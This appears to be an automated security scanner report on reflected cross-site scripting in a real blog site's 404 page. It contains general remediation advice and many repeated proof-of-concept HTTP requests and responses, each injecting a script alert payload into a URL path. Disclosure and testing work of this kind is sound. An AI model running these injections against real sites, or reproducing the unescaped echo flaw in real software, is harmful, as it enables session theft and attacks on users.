Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc76e<script>alert(1)</script>bcb67c3cc6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faqcc76e<script>alert(1)</script>bcb67c3cc6e HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 327

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faqcc76e<script>alert(1)</script>bcb67c3cc6e was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9edc<script>alert(1)</script>e1d9afc7813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faqc9edc<script>alert(1)</script>e1d9afc7813/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faqc9edc<script>alert(1)</script>e1d9afc7813/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21a51<script>alert(1)</script>fb51523ad13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq21a51<script>alert(1)</script>fb51523ad13/index.xml HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 337

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faq21a51<script>alert(1)</script>fb51523ad13/index.xml was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7f75<script>alert(1)</script>8dac30374f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 337

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bab7<script>alert(1)</script>a6fd1a47986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jobs1bab7<script>alert(1)</script>a6fd1a47986 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /jobs1bab7<script>alert(1)</script>a6fd1a47986 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a2e2<script>alert(1)</script>bf577de6d6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 332

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95a59<script>alert(1)</script>8e7980713e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a534<script>alert(1)</script>8a298db320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b191<script>alert(1)</script>638b7d947db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6552d<script>alert(1)</script>a04c546c7c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1adf9<script>alert(1)</script>84f161db5a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55147<script>alert(1)</script>0105bf04052 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79994<script>alert(1)</script>e7a8e90b39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8db7f<script>alert(1)</script>1733790e5e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3b98<script>alert(1)</script>f3dc42bdead was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f14e<script>alert(1)</script>8a7f5560974 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85944<script>alert(1)</script>d8b652c75fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b19b6<script>alert(1)</script>a2e5dc60e78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ was not found on this server.</p>
...[SNIP]...
